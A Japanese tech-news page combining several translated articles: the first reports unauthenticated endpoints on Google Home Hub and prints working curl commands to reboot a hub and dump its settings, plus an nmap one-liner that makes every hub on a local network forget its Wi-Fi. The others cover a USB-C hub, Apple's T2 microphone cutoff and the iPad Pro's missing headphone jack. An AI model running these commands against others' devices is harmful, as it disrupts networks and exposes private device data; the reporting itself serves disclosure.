セキュリティの普及活動家であるJerry Gamblinがポストした、主にXMLの行から成るコードは、Google Home Hubから容易に情報を取り出し、ときには一時的にそのデバイスを動かなくしてしまう。

Home Hubは要するに、Androidタブレットにスピーカーをくっつけた製品で、室内で使うGoogle Assistantデバイスとして設計されている。それは近くのWi-Fiアクセスポイントを見つけ、ユーザーはそのどれかに接続し、他のデバイスからビデオや写真を受信したり、リモートのコマンドを受け付けたりする。ビデオを受信するときには自分のPINを送信するし、また受け取るコマンドの中にはコマンドラインのクイックリブートもありえる。

問題のコマンドは、コマンドラインからの簡単なURL呼び出しで、明らかにセットアッププロセスの一部だ。ご自分で試したい人は’hub’のところをHome HubのローカルなIPアドレスに置換するとよい:

curl -Lv -H Content-Type:application/json --data-raw '{"params":"now"}' http://hub:8008/setup/reboot

[ぼくはIoTのセキュリティのエキスパートではないが、不正なcurlコマンドでGoogleのHome Hubをリブートできるのはおかしいよね。]

これも1行のコード(curlコマンド)だが、マイクロサービスの数などの情報を暴露する:

$ curl -s http://hub:8008/setup/eureka_info | jq
{
"bssid": "cc:be:59:8c:11:8b",
"build_version": "136769",
"cast_build_revision": "1.35.136769",
"closed_caption": {},
"connected": true,
"ethernet_connected": false,
"has_update": false,
"hotspot_bssid": "FA:8F:CA:9C:AA:11",
"ip_address": "192.168.1.1",
"locale": "en-US",
"location": {
"country_code": "US",
"latitude": 255,
"longitude": 255
},
"mac_address": "11:A1:1A:11:AA:11",
"name": "Hub Display",
"noise_level": -94,
"opencast_pin_code": "1111",
"opt_in": {
"crash": true,
"opencast": true,
"stats": true
},
"public_key": "Removed",
"release_track": "stable-channel",
"setup_state": 60,
"setup_stats": {
"historically_succeeded": true,
"num_check_connectivity": 0,
"num_connect_wifi": 0,
"num_connected_wifi_not_saved": 0,
"num_initial_eureka_info": 0,
"num_obtain_ip": 0
},
"signal_level": -60,
"ssdp_udn": "11111111-adac-2b60-2102-11111aa111a",
"ssid": "SSID",
"time_format": 2,
"timezone": "America/Chicago",
"tos_accepted": true,
"uma_client_id": "1111a111-8404-437a-87f4-1a1111111a1a",
"uptime": 25244.52,
"version": 9,
"wpa_configured": true,
"wpa_id": 0,
"wpa_state": 10
}

そして下のnmap呼び出しは、ローカルなネットワーク上のすべてのデバイスが自分のWi-Fiを忘れてしまうので、もう一度セットアップしなければならない:

nmap --open -p 8008 192.168.1.0/24 | awk '/is up/ {print up}; {gsub (/(|)/,""); up = $NF}' | xargs -I % curl -Lv -H Content-Type:application/json --data-raw '{ "wpa_id": 0 }' http://%:8008/setup/forget_wifi

Gamblinも言っているが、これらのセキュリティホールは壊滅的ではないが要注意だ。これらのコマンドやツールを不正に実行できてしまうこと自体、よく言えば怠慢だし、悪く言えば危険だ。彼の指摘によると、このオープンなエンドポイントは何年も前からいろんなGoogleデバイスにある。だからこれはコードベースの正常な一部であり、Googleによるいたずらではない。

ここには、重大なものは何もないし、Home Hubが重要な医療機器を制御することもない。でも、このプラットホームを使ってるデバイスにセキュリティの欠陥があることは、知っておいて損はない。この場合はコマンドの不正実行やシステムの盗用だ。しかし今日はGrandpaの超複雑な写真フレームをリブートできるだけだが、明日になると誰かが、うちのおじいちゃんの酸素濃縮器をリブートするかもしれない。

[原文へ]
(翻訳:iwatani(a.k.a. hiwa

このガジェットはApple電源アダプターにUSB 3.0ポートを2つ追加する

これは賢い。HyperDriveが作ったこのUSB-C Hubは、AppleのUSB-C電源アダプターに差し込むとUSB 3.0ポートが2つ増える。それだけだ。私はすごく気に入っていて、Appleの現在のノートパソコンラインアップの大きな弱点をカバーしている。

Appleは多用途のUSB-Cを選びフルサイズのUSBポートを廃止した。これはある意味で理にかなってはいる。USB-Cは現存するバス仕様のほぼすべてに対応しているが、世間にはまだ古いUSBプラグをつけて売られているデバイスが山ほどある。iPhoneのように。誰かがAppleストアに立ち寄って最新のiPhoneとMacBook Proを買うと、iPhoneをMacBook Proで充電するためにはアダプターが必要になる。だったらこれを作ればいい。

似たような製品は以前から出回っていたが、USBポートを増やすのに電源ポートを使うものが多かった。これはUSB-Cの電源を使うため、他社製品よりもひと回り小さくなっている。

HyperDrive USB-C Hubは、2種類のApple電源アダプターにマッチするように2つのタイプが用意されている。61 W電源アダプター用は39.99ドル、87 W用は49.99ドル。どちらもHyperのサイトで予約受付中で25%の割引が受けられる。

[原文へ]

(翻訳:Nob Takahashi / facebook

AppleのセキュリティチップT2はMacBookのマイクロフォンからの盗聴をハードウェアレベルで不可能に

Appleの最新のMacBookは、マイクロフォンからの盗聴がさらに困難になっている。

この前発売されたMacBook Proから、今日のMacBook Airに至るまで、最新のMacBookには、セキュリティチップT2が内蔵され、それが暗号鍵やストレージ、指紋データ、そしてセキュアブート機能を護る。

このチップのことはこれまでほとんど知られていなかったが、発表されたばかりのセキュリティガイドによると、このチップにはマイクロフォンとデバイス本体との接続をハードウェア的に切る機能があり、本体の蓋を閉めると必ずそれが作動する。

ガイドにはこう書かれている: “この断線機能はハードウェアのみで実装されているから、いかなるソフトウェアからも操作できない。macOSのroot特権やカーネル特権、それにT2チップ上のソフトウェアですら、蓋が閉められているときマイクロフォンに関与することはできない”。

ただし、カメラは切断されない。“蓋が閉じていると視界が完全に遮(さえぎ)られるから”だ。

Appleによると、この新しい機能はMacに“これまでなかった”高いレベルのセキュリティを賦与する。Macはマルウェアに感染しない、というストレートな言い方はしていないが…。

Webカメラを利用するハッカーの脅威は何年も前からの現実で、それはリモートアドミニストレーションツール(“RATs”)を使ってのぞき屋たちが、ラップトップのカメラからリモートでターゲットをスパイする。そのため、Webカメラのレンズにポストイットを貼ることが流行(はや)った。

AppleのWebカメラはライトがハードウェアに接続しているので、ユーザーが知らない間に(ソフトウェアが勝手に)Webカメラを起動することは不可能、と信じられていた。Macには、Webカメラののぞき攻撃に対する十分な免疫がある、と思われていた。しかし昨年、セキュリティ研究家のPatrick Wardleが、この神話を破壊したFruitflyマルウェアを発見した。

そのパラノイアは神話ではなく現実だ。イギリス政府の諜報機関GCHQは、その“Optic Nerve”プログラムの一環として長年、Webカメラの悪用を調査した。FacebookのCEO Mark Zuckerbergでさえ、自分のWebカメラとMacBookのマイクロフォンにガムテープを貼っていると報道された。ただし、マイクロフォンが拾う音を数枚のガムテープで遮断することはできない。

Webカメラやマイクロフォンが作動したらアラートするWardeのOversightのようなツールはあるけど、高度なマルウェアがこっそりとMacBookのマイクを使って環境音を聞き取ることを、防げるものはほとんどない。

でも蓋が閉められるときマイクロフォンをMacBookのハードウェアから切断したら、その眠っているデバイスがユーザーをスパイすることは、きわめて難しい。

Long-awaited brand-new MacBook Air finally gets retina display and Touch ID(未訳)

Apple Fall Event 2018

画像クレジット: Apple, クリエイティブコモンズND 4.0ライセンスによる

[原文へ]
(翻訳:iwatani(a.k.a. hiwa

iPad Proからヘッドホンジャックが消えた

iPad Proの最新モデルにはヘッドホンジャックがない。消えてしまった。もう遅い。しかも、iPhoneに付いてくるヘッドホンも使えない。AppleはLightningを捨てUSB-Cを採用した。その代わりにAppleはUSB-C ->3.5mmの変換アダプターを9ドルで売っている

最新のiPad ProモデルはiPhoneの歩んだ道を追いかけている。iPhoneと同じくホームボタンをなくし、ヘッドホンジャックも消えた。一部ユーザーにとっては驚きの譲歩だ。iPhoneの場合、大きなポートのための場所がないことは明らかだが、理論的には、タブレットのような大型デバイスではさほど問題ではない。Apple は似たようなハードウェアのセットを使って異なる製品を作ることで利益を最大化しようとする傾向にある。iPhoneに2016年以来ヘッドホンジャックがないことから、Appleのもう一つのモバイル機器にもそのトレンドがやってくる時期が来たのだろう。

取り残されたのはヘッドホンユーザーだけではない。iPadは長年にわたり安定したオーディオコントローラーだった。これからはタブレットとステレオを直接3.5 mmケーブルでつなぐかわりに、9ドルのドングルが必要になる。ヘッドホンを使いたいって? Appleは明らかに、iPadオーナーが159ドルのAirPodsを使うことを望んでいるが、世間にはUSB-Cヘッドホンが溢れGoogle製品もある

Apple Fall Event 2018

[原文へ]

(翻訳:Nob Takahashi / facebook